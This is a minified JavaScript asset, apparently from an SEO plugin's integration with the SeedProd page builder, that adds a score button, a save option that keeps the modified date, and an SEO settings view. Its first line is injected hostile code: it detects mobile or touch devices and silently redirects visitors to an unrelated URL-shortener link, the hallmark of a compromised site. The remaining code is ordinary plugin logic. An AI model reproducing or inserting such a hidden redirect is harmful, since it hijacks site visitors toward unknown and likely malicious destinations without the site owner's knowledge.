(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{au as a,f as p,Q as d,R as m,a0 as c,v as s,T as l,P as u,ao as g,ap as f,an as _,h}from"./js/vendor-vue-ui.232c7c36.js";import{l as w}from"./js/index.98d01501.js";import{l as v}from"./js/index.2a5d16ad.js";import{l as b}from"./js/index.0d80c2c2.js";import{k as y,u as S,ah as $,m as L,l as x}from"./js/app-core.c8323d51.js";import{P as B}from"./js/PageBuilderIntegration.8f49c17e.js";import{h as C}from"./js/helpers.51b78c1a.js";import{_ as E}from"./js/vendor-other.39e59221.js";import{_ as i}from"./js/App.0b3fa3ba.js";import{_ as P}from"./js/ScoreButton.fc8d811b.js";import{S as k}from"./js/LogoGear.93a225a7.js";import"./js/Button.3cec2279.js";import"./js/_plugin-vue_export-helper.eefbdd86.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";/* empty css                */import"./js/ScrollAndHighlight.5271fbff.js";import"./js/ScrollTo.f4df02aa.js";import"./js/LicenseKeyBar.0038e5e6.js";import"./js/vendor-phone.2afdf77e.js";import"./js/icon.ba2c22aa.js";import"./js/Tabs.ea329423.js";import"./js/ProBadge.7b829f47.js";import"./js/Information.6ccba108.js";import"./js/Slide.f2114d9d.js";import"./js/Index.6933f196.js";import"./js/SettingsRow.7bec777f.js";import"./js/Row.2ef96b1a.js";import"./js/Settings.0cdcb0c1.js";import"./js/Build.dac8d77a.js";import"./js/AiContent.9078cdd2.js";const M=()=>{document.getElementById("seedprod-builder-save").addEventListener("click",C)},n={id:"aioseo-limit-modified-date-seedprod",param:"aioseo_limit_modified_date",title:E("Save (Don't Modify Date)","all-in-one-seo-pack"),svg:'<svg xmlns="http://www.w3.org/2000/svg" width="12" height="14" class="sp-w-4 sp-fill-current sp-inline sp-mr-2"><path fill="currentColor" d="M10.7 2H10V.7H8.7V2H3.3V.7H2V2h-.7C.6 2 0 2.6 0 3.3v9.4c0 .7.6 1.3 1.3 1.3h9.4c.7 0 1.3-.6 1.3-1.3V3.3c0-.7-.6-1.3-1.3-1.3Zm0 10.7H1.3V6h9.4v6.7Zm-9.4-8V3.3h9.4v1.4H1.3Zm2.2 6.2.7.7L5.8 10l1.6 1.6.8-.7-1.7-1.6 1.7-1.6-.8-.7-1.6 1.6L4.2 7l-.7.7L5 9.3 3.5 11Z"/></svg>'},V=t=>{delete t.$children[0].$data.shared.settings[n.param];const o=document.createElement("button");o.id=n.id,o.textContent=n.title,o.className="sp-btn sp-font-semibold",o.type="button",o.innerHTML=`<span>${n.svg}${n.title}</span>`,o.addEventListener("click",()=>{t.$children[0].$data.shared.settings[n.param]=!0,document.getElementById("seedprod-builder-save").click(),setTimeout(()=>delete t.$children[0].$data.shared.settings[n.param])}),y("#seedprod-builder-save-dropdown-menu","seedprodBuilderSaveDropdownMenu"),document.addEventListener("animationstart",r=>{r.animationName==="seedprodBuilderSaveDropdownMenu"&&r.target.insertAdjacentElement("afterbegin",o)},{passive:!0})},H={__name:"Button",emits:["click"],setup(t){const{currentPost:o}=a(S());return(r,e)=>(p(),d(s(P),{"show-score":s($)(),score:s(o).seo_score,class:u([""]),onClick:e[0]||(e[0]=l(N=>r.$emit("click"),["prevent"]))},{icon:m(()=>[c(s(k))]),_:1},8,["show-score","score"]))}},A=async()=>{await new B({scoreBtn:{component:H,appName:"Standalone/SeedProd/Button",node:{$wrapper:document.querySelector("#sp-builder-top-main-nav"),tag:"div",attributes:{id:"aioseo-seedprod-toolbar-button",style:"align-content: center; margin-left: 10px; cursor: pointer; display: block;",role:"button"}}}}).mount(),document.addEventListener("aioseo-pagebuilder-toggle-modal",()=>{window.seedprod_app.$router.push({name:"setup_settings_seo"})})},D=t=>{t.$watch("$route.name",o=>{if(o==="setup_settings_seo"){const r=g({history:f(),routes:[{path:"/:pathMatch(.*)*",component:i}]});let e=_({name:"Standalone/SeedProd",data(){return{tableContext:window.aioseo.currentPost.context,screenContext:"metabox"}},mounted:()=>{setTimeout(L)},render:()=>h(i)});e=w(e),e=v(e),e=b(e),e.use(r),r.app=e,x(e,r),e.mount("#seedprod-preview-wrapper .seedprod-settings-page-wrapper"),document.querySelector(".seedprod-settings-page-wrapper").classList.remove("seedprod-settings-page-wrapper")}},{immediate:!0})},T=()=>{const t=document.getElementById("aioseo-seedprod-common-css");t&&t.setAttribute("href",t.getAttribute("data-href"))},I=t=>{A(),D(t),T(),M(),V(t)};document.addEventListener("DOMContentLoaded",()=>{window.seedprod_app?._isMounted&&I(window.seedprod_app)});
